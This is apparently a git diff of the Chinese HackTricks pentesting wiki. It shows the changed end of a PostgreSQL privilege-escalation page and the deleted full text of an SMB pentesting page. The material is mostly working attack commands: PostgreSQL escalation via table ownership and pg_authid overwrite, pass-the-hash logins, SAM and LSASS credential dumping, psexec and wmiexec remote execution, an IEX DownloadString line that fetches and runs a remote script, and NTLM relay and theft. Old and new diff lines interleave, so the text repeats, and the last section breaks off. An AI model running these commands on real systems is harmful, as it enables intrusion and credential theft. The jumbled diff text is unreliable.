在 [**这篇文章**](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities) 中解释了如何在 Postgres GCP 中利用授予用户的 ALTER TABLE 权限进行 **privesc**
当你尝试 **将另一个用户设为表的所有者** 时,你应该会收到一个 **错误** 阻止此操作,但显然 GCP 给了 **非超级用户 postgres 用户** 这个 **选项**
当你尝试 **使另一个用户成为表的所有者** 时,你应该会收到一个 **错误** 阻止此操作,但显然 GCP 给了 **非超级用户 postgres 用户** 这个 **选项**
<figure><img src="../images/image (537).png" alt=""><figcaption></figcaption></figure>
将这个想法与 **INSERT/UPDATE/**[**ANALYZE**](https://www.postgresql.org/docs/13/sql-analyze.html) 命令在 **带有索引函数的表** 上执行时,**函数** 作为命令的一部分**表** **所有者的权限****调用** 的事实结合起来。可以创建一个带有函数的索引,并将超级用户的所有者权限授予该表,然后在带有恶意函数的表上运行 ANALYZE该函数将能够执行命令因为它使用的是所有者的权限。
将这个想法与 **INSERT/UPDATE/**[**ANALYZE**](https://www.postgresql.org/docs/13/sql-analyze.html) 命令在 **带有索引函数的表** 上执行时,**函数** 会在命令中**表** **所有者的权限****调用** 的事实结合起来。可以创建一个带有函数的索引,并将所有者权限授予该表**超级用户**,然后在带有恶意函数的表上运行 ANALYZE该函数将能够执行命令因为它使用的是所有者的权限。
```c
GetUserIdAndSecContext(&save_userid, &save_sec_context);
SetUserIdAndSecContext(onerel->rd_rel->relowner,
@ -579,13 +578,13 @@ save_sec_context | SECURITY_RESTRICTED_OPERATION);
```
#### 利用
1. 首先创建一个新表。
1. 开始创建一个新表。
2. 向表中插入一些无关的内容,以提供索引函数的数据。
3. 开发一个包含代码执行有效负载的恶意索引函数,允许执行未经授权的命令。
4. 将表的所有者更改为 "cloudsqladmin",这是 GCP 的超级用户角色,专门用于 Cloud SQL 管理和维护数据库。
5. 对表执行 ANALYZE 操作。此操作迫使 PostgreSQL 引擎切换到表所有者 "cloudsqladmin" 的用户上下文。因此,恶意索引函数以 "cloudsqladmin" 的权限被调用,从而使之前未经授权的 shell 命令得以执行。
4. 将表的所有者更改为“cloudsqladmin”这是GCP的超级用户角色专门用于Cloud SQL管理和维护数据库。
5. 对表执行ANALYZE操作。此操作迫使PostgreSQL引擎切换到表所有者“cloudsqladmin”的用户上下文。因此恶意索引函数以“cloudsqladmin”的权限被调用从而启用之前未经授权的shell命令的执行。
PostgreSQL 中,这个流程看起来像这样:
在PostgreSQL中这个流程看起来像这样
```sql
CREATE TABLE temp_table (data text);
CREATE TABLE shell_commands_results (data text);
@ -645,7 +644,7 @@ SELECT * FROM pg_proc WHERE proname='dblink' AND pronargs=2;
```
### **自定义定义的函数与** SECURITY DEFINER
[**在这篇文章中**](https://www.wiz.io/blog/hells-keychain-supply-chain-attack-in-ibm-cloud-databases-for-postgresql),渗透测试能够在IBM提供的postgres实例中进行权限提升因为他们**发现了这个带有SECURITY DEFINER标志的函数**
[**在这篇文章中**](https://www.wiz.io/blog/hells-keychain-supply-chain-attack-in-ibm-cloud-databases-for-postgresql),渗透测试人员能够在IBM提供的postgres实例中进行权限提升因为他们**发现了这个带有SECURITY DEFINER标志的函数**
<pre class="language-sql"><code class="lang-sql">CREATE OR REPLACE FUNCTION public.create_subscription(IN subscription_name text,IN host_ip text,IN portnum text,IN password text,IN username text,IN db_name text,IN publisher_name text)
RETURNS text
@ -668,7 +667,7 @@ PERFORM dblink_disconnect();
正如[**文档中所解释的**](https://www.postgresql.org/docs/current/sql-createfunction.html),带有**SECURITY DEFINER的函数是以** **拥有者的权限** **执行的**。因此,如果该函数**易受SQL注入攻击**或正在执行一些**由攻击者控制的参数的特权操作**,则可能被滥用以**在postgres中提升权限**。
在前面代码的第4行中可以看到该函数具有**SECURITY DEFINER**标志。
在前面代码的第4行中,您可以看到该函数具有**SECURITY DEFINER**标志。
```sql
CREATE SUBSCRIPTION test3 CONNECTION 'host=127.0.0.1 port=5432 password=a
user=ibm dbname=ibmclouddb sslmode=require' PUBLICATION test2_publication
@ -680,8 +679,8 @@ WITH (create_slot = false); INSERT INTO public.test3(data) VALUES(current_user);
### 使用 PL/pgSQL 进行密码暴力破解
**PL/pgSQL** 是一种**功能齐全的编程语言**相比于 SQL 提供了更强的过程控制。它支持使用**循环**和其他**控制结构**来增强程序逻辑。此外,**SQL 语句**和**触发器**能够调用使用**PL/pgSQL 语言**创建的函数。这种集成使得数据库编程和自动化的方法更加全面和灵活。\
**您可以利用这种语言来请求 PostgreSQL 进行用户凭证的暴力破解。**
**PL/pgSQL** 是一种**功能齐全的编程语言**与 SQL 相比,它提供了更大的过程控制。它支持使用**循环**和其他**控制结构**来增强程序逻辑。此外,**SQL 语句**和**触发器**能够调用使用**PL/pgSQL 语言**创建的函数。这种集成使得数据库编程和自动化的方法更加全面和多样化。\
**您可以滥用这种语言来请求 PostgreSQL 进行用户凭据的暴力破解。**
{{#ref}}
../pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md
@ -689,21 +688,21 @@ WITH (create_slot = false); INSERT INTO public.test3(data) VALUES(current_user);
### 通过覆盖内部 PostgreSQL 表进行权限提升
> [!NOTE]
> [!TIP]
> 以下权限提升向量在受限的 SQLi 上下文中特别有用,因为所有步骤都可以通过嵌套的 SELECT 语句执行
如果您可以**读取和写入 PostgreSQL 服务器文件**,您可以通过覆盖与内部 `pg_authid` 表相关的 PostgreSQL 磁盘文件节点来**成为超级用户**。
如果您可以**读取和写入 PostgreSQL 服务器文件**,您可以通过覆盖与内部 `pg_authid` 表相关的 PostgreSQL 磁盘文件节点来**成为超级用户**。
有关**此技术**的更多信息[**请点击这里**](https://adeadfed.com/posts/updating-postgresql-data-without-update/)**。**
攻击步骤如下:
1. 获取 PostgreSQL 数据目录
2. 获取与 `pg_authid` 表相关的文件节点的相对路径
2. 获取与 `pg_authid` 表相关的文件节点的相对路径
3. 通过 `lo_*` 函数下载文件节点
4. 获取与 `pg_authid` 表相关的数据类型
5. 使用 [PostgreSQL 文件节点编辑器](https://github.com/adeadfed/postgresql-filenode-editor) [编辑文件节点](https://adeadfed.com/posts/updating-postgresql-data-without-update/#privesc-updating-pg_authid-table);将所有 `rol*` 布尔标志设置为 1 以获得完全权限。
6. 通过 `lo_*` 函数重新上传编辑的文件节点,并覆盖磁盘上的原始文件
4. 获取与 `pg_authid` 表相关的数据类型
5. 使用 [PostgreSQL Filenode Editor](https://github.com/adeadfed/postgresql-filenode-editor) [编辑文件节点](https://adeadfed.com/posts/updating-postgresql-data-without-update/#privesc-updating-pg_authid-table);将所有 `rol*` 布尔标志设置为 1 以获得完全权限。
6. 通过 `lo_*` 函数重新上传编辑的文件节点,并覆盖磁盘上的原始文件
7. _(可选)_ 通过运行一个昂贵的 SQL 查询清除内存中的表缓存
8. 您现在应该拥有完整超级管理员的权限。
@ -717,7 +716,7 @@ msf> use exploit/windows/postgres/postgres_payload
```
### logging
_**postgresql.conf**_ 文件中,您可以通过更改来启用 postgresql 日志:
_**postgresql.conf**_ 文件中,您可以通过更改以下内容来启用 postgresql 日志:
```bash
log_statement = 'all'
log_filename = 'postgresql-%Y-%m-%d_%H%M%S.log'
@ -732,7 +731,7 @@ sudo service postgresql restart
[pgadmin](https://www.pgadmin.org) 是一个用于 PostgreSQL 的管理和开发平台。\
您可以在 _**pgadmin4.db**_ 文件中找到 **密码**。\
您可以使用脚本中的 _**decrypt**_ 函数对其进行解密: [https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py](https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py)
您可以使用脚本中的 _**decrypt**_ 函数对其进行解密:[https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py](https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py)
```bash
sqlite3 pgadmin4.db ".schema"
sqlite3 pgadmin4.db "select * from user;"
@ -743,6 +742,6 @@ string pgadmin4.db
PostgreSQL中的客户端身份验证通过一个名为**pg_hba.conf**的配置文件进行管理。该文件包含一系列记录每条记录指定了连接类型、客户端IP地址范围如适用、数据库名称、用户名以及用于匹配连接的身份验证方法。第一个匹配连接类型、客户端地址、请求的数据库和用户名的记录用于身份验证。如果身份验证失败则没有后备或备份。如果没有记录匹配则拒绝访问。
pg_hba.conf中可用的基于密码的身份验证方法有**md5**、**crypt**和**password**。这些方法在密码传输方式上有所不同MD5哈希、crypt加密或明文。需要注意的是crypt方法不能与在pg_authid中加密的密码一起使用。
pg_hba.conf中可用的基于密码的身份验证方法有**md5**、**crypt**和**password**。这些方法在密码传输方式上有所不同MD5哈希、crypt加密或明文。需要注意的是crypt方法不能与在pg_authid中加密的密码一起使用。
{{#include ../banners/hacktricks-training.md}}

532
src/network-services-pentesting/pentesting-smb.md
View File

@ -1,532 +0,0 @@
# 139,445 - Pentesting SMB
{{#include ../banners/hacktricks-training.md}}
## **Port 139**
_**网络基本输入输出系统**_** (NetBIOS)** 是一种软件协议,旨在使局域网 (LAN) 内的应用程序、个人电脑和桌面能够与网络硬件交互,并**促进数据在网络上的传输**。通过其 NetBIOS 名称,可以识别和定位在 NetBIOS 网络上运行的软件应用程序,这些名称最长可达 16 个字符,通常与计算机名称不同。当一个应用程序(充当客户端)发出命令“呼叫”另一个应用程序(充当服务器)时,两个应用程序之间的 NetBIOS 会话就会启动,使用**TCP 端口 139**。
```
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
```
## Port 445
从技术上讲,端口 139 被称为“NBT over IP”而端口 445 被识别为“SMB over IP”。缩写 **SMB** 代表“**服务器消息块**”,现代也被称为 **通用互联网文件系统 (CIFS)**。作为一种应用层网络协议SMB/CIFS 主要用于实现对文件、打印机、串口的共享访问,并促进网络中节点之间的各种形式的通信。
例如,在 Windows 的上下文中,强调 SMB 可以直接通过 TCP/IP 操作,消除了通过 TCP/IP 使用 NetBIOS 的必要性,利用端口 445。相反在不同的系统上观察到使用端口 139这表明 SMB 正在与 TCP/IP 上的 NetBIOS 一起执行。
```
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
```
### SMB
**服务器消息块 (SMB)** 协议在 **客户端-服务器** 模型中运行,旨在调节对 **文件**、目录和其他网络资源(如打印机和路由器)的 **访问**。主要用于 **Windows** 操作系统系列SMB 确保向后兼容,使得运行较新版本微软操作系统的设备能够与运行较旧版本的设备无缝交互。此外,**Samba** 项目提供了一个免费软件解决方案,使 SMB 能够在 **Linux** 和 Unix 系统上实现,从而通过 SMB 促进跨平台通信。
共享,代表 **本地文件系统的任意部分**,可以由 SMB 服务器提供,使得客户端部分 **独立** 于服务器的实际结构地可见。**访问控制列表 (ACLs)** 定义了 **访问权限**,允许对用户权限进行 **细粒度控制**,包括 **`执行`**、**`读取`** 和 **`完全访问`** 等属性。这些权限可以根据共享分配给单个用户或组,并且与服务器上设置的本地权限不同。
### IPC$ Share
可以通过匿名空会话访问 IPC$ 共享,从而与通过命名管道暴露的服务进行交互。实用工具 `enum4linux` 对此非常有用。正确使用时,它可以获取:
- 操作系统信息
- 父域的详细信息
- 本地用户和组的汇编
- 可用 SMB 共享的信息
- 有效的系统安全策略
此功能对于网络管理员和安全专业人员评估网络上 SMB (服务器消息块) 服务的安全态势至关重要。`enum4linux` 提供了目标系统 SMB 环境的全面视图,这对于识别潜在漏洞和确保 SMB 服务的适当安全至关重要。
```bash
enum4linux -a target_ip
```
上述命令是如何使用 `enum4linux` 对指定的 `target_ip` 进行全面枚举的示例。
## 什么是 NTLM
如果你不知道什么是 NTLM或者你想知道它是如何工作的以及如何利用它你会发现关于 **NTLM** 的这个页面非常有趣,其中解释了 **这个协议是如何工作的以及你如何可以利用它:**
{{#ref}}
../windows-hardening/ntlm/
{{#endref}}
## **服务器枚举**
### **扫描** 网络以搜索主机:
```bash
nbtscan -r 192.168.0.1/24
```
### SMB 服务器版本
要查找可能针对 SMB 版本的漏洞,了解正在使用的版本非常重要。如果此信息未出现在其他使用的工具中,您可以:
- 使用 **MSF** 辅助模块 _**auxiliary/scanner/smb/smb_version**_
- 或者这个脚本:
```bash
#!/bin/sh
#Author: rewardone
#Description:
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
#Notes:
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
echo "" && sleep .1
```
### **搜索漏洞**
```bash
msf> search type:exploit platform:windows target:2008 smb
searchsploit microsoft smb
```
### **可能的** 凭据
| **用户名** | **常见密码** |
| -------------------- | ----------------------------------------- |
| _(空白)_ | _(空白)_ |
| guest | _(空白)_ |
| Administrator, admin | _(空白)_, password, administrator, admin |
| arcserve | arcserve, backup |
| tivoli, tmersrvd | tivoli, tmersrvd, admin |
| backupexec, backup | backupexec, backup, arcada |
| test, lab, demo | password, test, lab, demo |
### 暴力破解
- [**SMB 暴力破解**](../generic-methodologies-and-resources/brute-force.md#smb)
### SMB 环境信息
### 获取信息
```bash
#Dump interesting information
enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>
nmap --script "safe or smb-enum-*" -p 445 <IP>
#Connect to the rpc
rpcclient -U "" -N <IP> #No creds
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb --pw-nt-hash
rpcclient -U "username%passwd" <IP> #With creds
#You can use querydispinfo and enumdomusers to query user information
#Dump user information
/usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
#Map possible RPC endpoints
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
```
### 枚举用户、组和登录用户
这些信息应该已经从 enum4linux 和 enum4linux-ng 收集。
```bash
crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u <username> -p <password>]
ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "
rpcclient -U "" -N 10.10.10.10
enumdomusers
enumdomgroups
```
### 枚举本地用户
[Impacket](https://github.com/fortra/impacket/blob/master/examples/lookupsid.py)
```bash
lookupsid.py -no-pass hostname.local
```
单行命令
```bash
for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
```
### Metasploit - 枚举本地用户
```bash
use auxiliary/scanner/smb/smb_lookupsid
set rhosts hostname.local
run
```
### **枚举 LSARPC 和 SAMR rpcclient**
{{#ref}}
pentesting-smb/rpcclient-enumeration.md
{{#endref}}
### 从 Linux 进行 GUI 连接
#### 在终端中:
`xdg-open smb://cascade.htb/`
#### 在文件浏览器窗口中nautilus, thunar 等)
`smb://friendzone.htb/general/`
## 共享文件夹枚举
### 列出共享文件夹
始终建议查看您是否可以访问任何内容,如果您没有凭据,请尝试使用 **null** **凭据/访客用户**
```bash
smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
smbmap -H <IP> [-P <PORT>] #Null user
smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash
smbmap -R -u "username" -p "password" -H <IP> [-P <PORT>] #Recursive list
crackmapexec smb <IP> -u '' -p '' --shares #Null user
crackmapexec smb <IP> -u 'username' -p 'password' --shares #Guest user
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares #Guest user
```
### **连接/列出共享文件夹**
```bash
#Connect using smbclient
smbclient --no-pass //<IP>/<Folder>
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
#Use --no-pass -c 'recurse;ls' to list recursively with smbclient
#List with smbmap, without folder it list everything
smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive list
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash
```
### **手动枚举 Windows 共享并连接到它们**
可能您被限制显示主机的任何共享,当您尝试列出它们时,似乎没有任何共享可供连接。因此,尝试手动连接到共享可能是值得的。要手动枚举共享,您可能想要查找像 NT_STATUS_ACCESS_DENIED 和 NT_STATUS_BAD_NETWORK_NAME 这样的响应,当使用有效会话(例如,空会话或有效凭据)时。这些可能表明共享是否存在,而您没有访问权限,或者共享根本不存在。
Windows 目标的常见共享名称包括
- C$
- D$
- ADMIN$
- IPC$
- PRINT$
- FAX$
- SYSVOL
- NETLOGON
(来自 _**网络安全评估第 3 版**_ 的常见共享名称)
您可以尝试使用以下命令连接到它们
```bash
smbclient -U '%' -N \\\\<IP>\\<SHARE> # null session to connect to a windows share
smbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)
```
或此脚本(使用空会话)
```bash
#/bin/bash
ip='<TARGET-IP-HERE>'
shares=('C$' 'D$' 'ADMIN$' 'IPC$' 'PRINT$' 'FAX$' 'SYSVOL' 'NETLOGON')
for share in ${shares[*]}; do
output=$(smbclient -U '%' -N \\\\$ip\\$share -c '')
if [[ -z $output ]]; then
echo "[+] creating a null session is possible for $share" # no output if command goes through, thus assuming that a session was created
else
echo $output # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME)
fi
done
```
示例
```bash
smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
```
### **从Windows枚举共享/无需第三方工具**
PowerShell
```bash
# Retrieves the SMB shares on the locale computer.
Get-SmbShare
Get-WmiObject -Class Win32_Share
# Retrieves the SMB shares on a remote computer.
get-smbshare -CimSession "<computer name or session object>"
# Retrieves the connections established from the local SMB client to the SMB servers.
Get-SmbConnection
```
CMD 控制台
```shell
# List shares on the local computer
net share
# List shares on a remote computer (including hidden ones)
net view \\<ip> /all
```
MMC 快捷工具(图形)
```shell
# Shared Folders: Shared Folders > Shares
fsmgmt.msc
# Computer Management: Computer Management > System Tools > Shared Folders > Shares
compmgmt.msc
```
explorer.exe (图形界面),输入 `\\<ip>\` 以查看可用的非隐藏共享。
### 挂载共享文件夹
```bash
mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
```
### **下载文件**
阅读前面的部分以了解如何使用凭据/Pass-the-Hash 进行连接。
```bash
#Search a file and download
sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it inside /usr/share/smbmap
```
```bash
#Download all
smbclient //<IP>/<share>
> mask ""
> recurse
> prompt
> mget *
#Download everything to current directory
```
命令:
- mask: 指定用于过滤目录中文件的掩码(例如,""表示所有文件)
- recurse: 切换递归开关(默认:关闭)
- prompt: 切换文件名提示开关(默认:开启)
- mget: 将与掩码匹配的所有文件从主机复制到客户端机器
(_来自smbclient的手册页_)
### 域共享文件夹搜索
- [**Snaffler**](https://github.com/SnaffCon/Snaffler)
```bash
Snaffler.exe -s -d domain.local -o snaffler.log -v data
```
- [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) 爬虫。
- `-M spider_plus [--share <share_name>]`
- `--pattern txt`
```bash
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
```
特别有趣的共享文件是名为 **`Registry.xml`** 的文件,因为它们 **可能包含** 配置为通过组策略 **自动登录** 的用户的密码。或者 **`web.config`** 文件,因为它们包含凭据。
- [**PowerHuntShares**](https://github.com/NetSPI/PowerHuntShares)
- `IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerHuntShares/main/PowerHuntShares.psm1")`
- `Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\temp\test`
> [!NOTE]
> **SYSVOL 共享** 对域中的所有经过身份验证的用户 **可读**。在这里你可能 **会发现** 许多不同的批处理、VBScript 和 PowerShell **脚本**。\
> 你应该 **检查** 里面的 **脚本**,因为你可能 **会发现** 敏感信息,例如 **密码**
## 读取注册表
你可能能够使用一些发现的凭据 **读取注册表**。Impacket **`reg.py`** 允许你尝试:
```bash
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s
```
## Post Exploitation
**Samba** 服务器的 **默认配置** 通常位于 `/etc/samba/smb.conf`,可能包含一些 **危险配置**
| **设置** | **描述** |
| --------------------------- | --------------------------------------------------------------- |
| `browseable = yes` | 允许列出当前共享中的可用共享? |
| `read only = no` | 禁止创建和修改文件? |
| `writable = yes` | 允许用户创建和修改文件? |
| `guest ok = yes` | 允许在不使用密码的情况下连接到服务? |
| `enable privileges = yes` | 尊重分配给特定 SID 的权限? |
| `create mask = 0777` | 新创建的文件必须分配什么权限? |
| `directory mask = 0777` | 新创建的目录必须分配什么权限? |
| `logon script = script.sh` | 用户登录时需要执行哪个脚本? |
| `magic script = script.sh` | 脚本关闭时应执行哪个脚本? |
| `magic output = script.out` | 魔法脚本的输出需要存储在哪里? |
命令 `smbstatus` 提供有关 **服务器****谁已连接** 的信息。
## Authenticate using Kerberos
您可以使用工具 **smbclient****rpcclient** 进行 **kerberos** 认证:
```bash
smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com
```
## **执行命令**
### **crackmapexec**
crackmapexec 可以通过 **mmcexec, smbexec, atexec, wmiexec** 中的任何一种方法 **执行** 命令,其中 **wmiexec****默认** 方法。您可以使用参数 `--exec-method` 指定您希望使用的选项:
```bash
apt-get install crackmapexec
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami #Excute cmd
crackmapexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami #Pass-the-Hash
# Using --exec-method {mmcexec,smbexec,atexec,wmiexec}
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam #Dump SAM
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa #Dump LSASS in memmory hashes
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions #Get sessions (
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users #Get logged-on users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks #Enumerate the disks
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users #Enumerate users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups # Enumerate groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups # Enumerate local groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol #Get password policy
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RID brute
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-Hash
```
### [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../windows-hardening/ntlm/smbexec.md)
这两种选项将**在受害者机器上创建一个新服务**(通过 SMB 使用 _\pipe\svcctl_),并利用它来**执行某些操作****psexec** 将**上传**一个可执行文件到 ADMIN$ 共享,而 **smbexec** 将指向 **cmd.exe/powershell.exe** 并将有效载荷作为参数放入 --**无文件技术-**)。\
有关 [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md) 和 [**smbexec**](../windows-hardening/ntlm/smbexec.md) 的**更多信息**。\
**kali** 中,它位于 /usr/share/doc/python3-impacket/examples/
```bash
#If no password is provided, it will be prompted
./psexec.py [[domain/]username[:password]@]<targetName or address>
./psexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
psexec \\192.168.122.66 -u Administrator -p 123456Ww
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash
```
使用 **参数**`-k`,您可以使用 **kerberos** 进行身份验证,而不是 **NTLM**
### [wmiexec](../windows-hardening/ntlm/wmiexec.md)/dcomexec
隐秘地执行命令 shell而不触及磁盘或运行新服务通过 **端口 135** 使用 DCOM。\
**kali** 中,它位于 /usr/share/doc/python3-impacket/examples/
```bash
#If no password is provided, it will be prompted
./wmiexec.py [[domain/]username[:password]@]<targetName or address> #Prompt for password
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
```
使用 **参数**`-k`,您可以使用 **kerberos** 进行身份验证,而不是 **NTLM**
```bash
#If no password is provided, it will be prompted
./dcomexec.py [[domain/]username[:password]@]<targetName or address>
./dcomexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
```
### [AtExec](../windows-hardening/ntlm/atexec.md)
通过任务调度程序执行命令(使用 _\pipe\atsvc_ 通过 SMB。\
**kali** 中,它位于 /usr/share/doc/python3-impacket/examples/
```bash
./atexec.py [[domain/]username[:password]@]<targetName or address> "command"
./atexec.py -hashes <LM:NT> administrator@10.10.10.175 "whoami"
```
## Impacket 参考
[https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/)
## **暴力破解用户凭据**
**这不推荐,如果超过允许的最大尝试次数,您可能会锁定账户**
```bash
nmap --script smb-brute -p 445 <IP>
ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name
```
## SMB 继电器攻击
此攻击使用 Responder 工具包来 **捕获内部网络上的 SMB 认证会话**,并将其 **中继****目标机器**。如果认证 **会话成功**,它将自动将您带入 **系统** **shell**。\
[**有关此攻击的更多信息请点击这里。**](../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
## SMB-Trap
当页面尝试通过 SMB 访问某些内容时Windows 库 URLMon.dll 会自动尝试对主机进行身份验证,例如: `img src="\\10.10.10.10\path\image.jpg"`
这发生在以下函数中:
- URLDownloadToFile
- URLDownloadToCache
- URLOpenStream
- URLOpenBlockingStream
这些函数被一些浏览器和工具(如 Skype使用。
![来源: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../images/image (93).png>)
### 使用 MitMf 的 SMBTrap
![来源: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../images/image (94).png>)
## NTLM 盗窃
与 SMB 捕获类似,将恶意文件植入目标系统(例如通过 SMB可以引发 SMB 认证尝试,从而允许使用如 Responder 之类的工具拦截 NetNTLMv2 哈希。然后可以离线破解该哈希或在 [SMB 继电器攻击](pentesting-smb.md#smb-relay-attack) 中使用。
[查看: ntlm_theft](../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm_theft)
## HackTricks 自动命令
```
Protocol_Name: SMB #Protocol Abbreviation if there is one.
Port_Number: 137,138,139 #Comma separated if there is more than one.
Protocol_Description: Server Message Block #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for SMB
Note: |
While Port 139 is known technically as NBT over IP, Port 445 is SMB over IP. SMB stands for Server Message Blocks. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.
#These are the commands I run in order every time I see an open SMB port
With No Creds
nbtscan {IP}
smbmap -H {IP}
smbmap -H {IP} -u null -p null
smbmap -H {IP} -u guest
smbclient -N -L //{IP}
smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
rpcclient {IP}
rpcclient -U "" {IP}
crackmapexec smb {IP}
crackmapexec smb {IP} --pass-pol -u "" -p ""
crackmapexec smb {IP} --pass-pol -u "guest" -p ""
GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
